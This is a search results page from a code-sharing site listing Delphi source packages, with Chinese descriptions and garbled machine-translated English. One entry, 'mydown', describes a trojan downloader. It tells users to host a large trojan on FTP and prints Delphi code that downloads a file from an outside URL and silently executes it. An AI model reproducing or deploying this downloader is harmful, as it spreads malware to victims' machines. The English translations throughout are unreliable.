Welcome![Sign In][Sign Up]
Location:
Search - delphi d

Search list

[Communicationlmail

Description: Lmail.Dll发邮件控件的特点: 1、将文件分断发送,理论上可以发送N兆大小的文件。 2、实时编码,边编边发,传送速度快。 3、提供进度条实时跟踪。 4、具有群发功能,可以一次性发送多个收件人、抄送人,密送人。 5、可以设置请求收件人回执。 6、能生成发送日志,便于跟踪SMTP错误。 7、为COM组件,支持VFP、VB、VC、DELPHI、PB。还支持 ASP网页编程。 -Lmail.Dll mail component characteristics : 1 to document sent off, it could theoretically send N Katherine size documents. 2, real-time coding, while series edge hair, transmission speed. 3, provide real-time tracking of progress. 4, with the mass function can be sent over a single addressee, copied, close friends. 5, set the request of the addressee acknowledgment. 6, can generate this log to facilitate tracking SMTP error. 7, COM support VFP, VB, VC, Delphi, PowerBuilder. The website also support ASP programming.
Platform: | Size: 43008 | Author: li | Hits:

[MySQLDirectMySQLObjects122.rel

Description: 用delphi连接mysql的组件,老外写的,比mysql提供的odbc快好多啊。-connect with mysql components, the student wrote, mysql than the odbc ah lot faster.
Platform: | Size: 367616 | Author: sudongyi | Hits:

[DirextXdxpack12

Description: This file is part of a component suite called Design } { eXperience and may be used in freeware- or commercial } { applications. The package itself is distributed as } { freeware with full sourcecodes. -This file is part of a component suite calle d) (eXperience Design and may be used in freewar e-) (or commercial applications. The package i tself is distributed as freeware) (with full so urcecodes.
Platform: | Size: 425984 | Author: hfb | Hits:

[File OperateFileStorage.v3.0.1

Description: he FileStorage component capable to upload and hold any data files within your Delphi/BCB forms (within the body of the EXE-program). If your software requires any additional files (.DLL s, WAV s, .TXT s etc), these files could be uploaded straight onto your form and be extracted from executable file at run-time (AutoExtract property). Also you can access to stored files directly from memory without extracting them to disk (see example). You can use this component if you would like to make high integration of your app with stored files and get access to them at run-time or, if you would like to supply your customers with just one, single executable file!.-he FileStorage component capable to Uploader d and hold any data files within your Delphi/BCB forms (within the body of the EXE-program). If y our software requires any additional files (. D LL s, s WAV and. TXT s etc), these files could be uploaded onto you straight r form and be extracted from executable file at r un-time (AutoExtract property). Also you can a ccess to stored files directly from memory with extracting them out to disk (see example). You c an use this component if you would like to make hi gh integration of your app with stored files and get access to them at run-time or, if you would like to supply your customers with j su one, single executable file! .
Platform: | Size: 118784 | Author: hfb | Hits:

[ActiveX/DCOM/ATLddeclientvb

Description: 利用基金会提供的OPCDAauto.dll,用自动化接口编程,利用VB,delphi等工具编程开发OPC-Foundation for the use of OPCDAauto.dll with automated programming interface, using VB, delphi programming tools such as OPC
Platform: | Size: 33792 | Author: bin | Hits:

[WEB CodeFVML3.0

Description: 本压缩包共包含: VML极道教程 - 最好的VML教程 FlashVml(闪耀之星)3.0 中文版、英文版 - 最强的VML开发工具 推荐解压、浏览方式: 建议解压缩至D或E盘任意位置(防止常重装系统的用户丢失) index.htm文件即是《VML极道教程》的核心阅读器,建议复制快捷方式到桌面 vmljdjc目录里包含了《VML极道教程》所有的文章内容文件、示例文件、flashvml3.0中英文版 建议打开vmljdjc目录,为flashvml3.htm(中文版)复制快捷方式到桌面 以后就可以直接在桌面打开《VML极道教程》学习,打开flashvml闪耀之星从事开发工作。 如果你是主页、网站站长,想将VML极道教程+FLASHVML完全上传到你的站点 那么直接将index.htm、vmljdjc目录全部上传即可,无需任何路径、名称修改 本说明文件看过后可以删除。 原作者/版权所有:沐缘华(原昵称:风云舞) -16:57 2005-2-25 让WEB因我们而改变!-the compression packages include : VML extremely Road Directory-the best guide FlashVml VML (Blazed Star) 3.0 version. English-strongest VML Development Tools Suggest unpack, browsing : proposals to extract the D or E was arbitrary location (often heavy equipment to prevent the loss of customers) that the document index.htm "VML extremely Road Guide," the core of readers, proposed copy shortcut to the desktop vmljdjc directory contains a "very VML Road Guide" all contents of the articles documentation, samples, flashvml3.0 version recommended to open vmljdjc directory, for flashvml3.htm (Chinese version) copy shortcut to the desktop they can open directly on the desktop "VML extremely Road Guide" study, open flashvml Blazed Star engaged in development work. If
Platform: | Size: 2208768 | Author: 可爱的中国 | Hits:

[File Operatexmldelphi

Description: delphi中读写XML文件。 例子中说明如何更加msxml类实现读xml文件,与写xml文件的方法-were read and write XML documents. Examples of how to achieve more msxml category Reading xml document, and write the way xml
Platform: | Size: 43008 | Author: feng | Hits:

[Internet-Networkmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1024 | Author: 韩冰 | Hits:

[CommunicationRS232_1.0.3.7

Description: 一个用delphi写的RS232收发程序,对收到的资料可以同时以ascII码和16进制数表示。最多可以支持到COM8-with an RS232 transceiver written procedures, the right information can be received simultaneously in ascII yards and 16 band several said. The maximum support to COM8
Platform: | Size: 244736 | Author: cangyu | Hits:

[Delphi/CppBuilderdel_jdrm

Description: DELPHI基础教程 目录   第一章 Delphi快速入门(一)   第一章 Delphi快速入门(二)   第一章 Delphi快速入门(三)   第一章 Delphi快速入门(四)   第一章 Delphi快速入门(五)   第二章 Delphi面向对象的编程方法(一)   第二章 Delphi面向对象的编程方法(二)   第二章 Delphi面向对象的编程方法(三)   第二章 Delphi面向对象的编程方法(四)   第三章 字符串列表及应用(一)   第三章 字符串列表及应用(二)   第四章 文本编辑器的设计(一)   第四章 文本编辑器的设计(二)   第五章 Delphi图形图像编程(一)   第五章 Delphi图形图像编程(二) -based Delphi Directory Contents Chapter 1 Delphi Quick Start (1) Chapter 1 Delphi Quick Start (2) the first chapter Delphi Quick Start (3) the first chapter D elphi Quick Start (4), the first chapter of Delphi Quick Start (5) Chapter II Del Delphi Object-Oriented Programming (1) Chapter II Delphi Object-Oriented Programming (2) the second chapter Delphi object-oriented programming (3) Chapter II Delphi Object-Oriented Programming (d) List of Chapter III of the string and Applications (1) Chapter III List of string and Applications (2 ), the fourth chapter of the text editor design (1) Chapter IV text editor Design (2) Chapter 5 Delphi graphics programming (1) Chapter V Delphi graphics programming (2)
Platform: | Size: 436224 | Author: 林靖然 | Hits:

[Firewall-SecurityOpenSLLforDelphi

Description: OpenSLL for Delphi 包含了libeay32.dll文件和openssl的说明文档,可以直接调用libeay32.d-OpenSLL for Delphi included libeay32.dll papers and op enssl the documentation can be called directly libeay32.d
Platform: | Size: 375808 | Author: james | Hits:

[Software Engineeringdunit-9.2.1

Description: For Delphi的单元测试工具DUnit的源代码-For Delphi unit testing tools DUnit source code
Platform: | Size: 794624 | Author: sandpo | Hits:

[Internet-Networkdelphi_demo

Description: DSC(Data Service Center)是用于接收DTU数据和向DTU发送数据的服务软件,和DTU之间通讯使用开发包动态库gprs_dll.dll,该文件包括和DTU通讯所需要的全部API函数,包括服务的启动、数据发送、数据接收、关闭服务等,DSC实际上是架构在gprs_dll.dll所提供的功能之上的数据处理软件,其所需要完成的功能如下: 1、 调用API启动服务和停止服务; 2、 调用API接收数据和向DTU发送数据,并且对数据作进一步处理; 3、 调用API轮询DTU用户列表,如果需要可作进一步处理,包括用户认证等; 4、 调用API对DTU进行远程配置 -DSC (Data Service Center) is used to receive data and to the DTU DT U send data services software, and communications between the DTU use development kits gprs_dll.dll DLL, the documents include communications and DTU need all API function, including the launch, data sending, receiving data, the closure of services, DSC is actually in gprs_dll.dll framework provided by the above functions of data processing software, they need to complete the following functions : 1, API calls to stop and restart services; 2. API call and receive data to the DTU send data, as well as data for further processing; 3. Call API Polling DTU user list, if necessary, for further processing, including user authentication; 4. Calling the API for remote configuration DTU
Platform: | Size: 321536 | Author: aspdotnet | Hits:

[Delphi VCLpngimage1.56

Description: This PNG Delphi version 1.56 documentation (this version is a major rewrite intended to replace the previous version, 1.2). Improvements in this new version includes: This new version allows the programmer to not use Delphi heavy units which will greatly reduce the size of the final executable. Read more about this feature here. Most, if not all, Portable Network Graphics features as CRC checking are now fully performed. Error on broken images are now better handled using new exception classes. The images may be saved using interlaced mode also. Transparency information won t be discarted after the image is loaded any more. Most of the images are decoded much faster now. The images will be better encoded using fresh new algorithms. IMPORTANT! Now transparency information is used to display images. -Delphi version 1.56 documentat ion (this version is a major rewrite intended to replace the previous version. 1.2). Improvements in this version include new s : This new version allows the programmer to not us e Delphi heavy units which will greatly reduce t he size of the final executable. Read more about this feature here. Most, if not all, Portable Network Graphics features as CRC Checkout king are now fully performed. Error on broken im ages are now better handled using new exception classes. The images may be saved using interlac ed mode also. Transparency information won t be discarted after the image is loaded any more. Mo st of the images are decoded much faster now. The better images will be encoded using fresh new al gorithms. IMPORTANT! Now transparency inform ation is used to d
Platform: | Size: 291840 | Author: Han Xun | Hits:

[Delphi/CppBuilderDelphiinPOSsys

Description: Delphi构建进销存POS系统开发实例-Delphi Construction PSI POS System Development example
Platform: | Size: 2597888 | Author: ddd123 | Hits:

[TCP/IP stackping_Dos

Description: 用delphi7 开发的模仿windows DOS ping d的程序原码。 -delphi7 used to imitate the development of the DOS windows ping d procedures original code.
Platform: | Size: 191488 | Author: david | Hits:

[Delphi VCLcport3

Description: 用Delphi写串口通信程序这最好的串口控制控件-write with Delphi serial communication procedure to the best serial control Controls
Platform: | Size: 1353728 | Author: 沈昌逸 | Hits:

[Audio programAudio_Object

Description: 一个功能完备的mp3播放软件,界面友好 开发工具为delphi ,无其他控件-a fully functioning mp3 player friendly interface development tool for delphi, no other controls
Platform: | Size: 6564864 | Author: 唐敖 | Hits:

[Othermatata_DelForEx_v2.5_D10

Description: delphi代码格式化,最新汉化版,支持2006,包含源码-delphi code formatting, the latest version of a Chinese support in 2006, included the source code
Platform: | Size: 1432576 | Author: | Hits:

[Hook apiHookSG

Description: Delphi中的StringGrid,Hook其他程序的StringGrid的内容-the StringGrid Delphi, Hook other procedures StringGrid content
Platform: | Size: 706560 | Author: pp | Hits:
« 1 2 3 45 6 7 8 9 10 ... 26 »

CodeBus www.codebus.net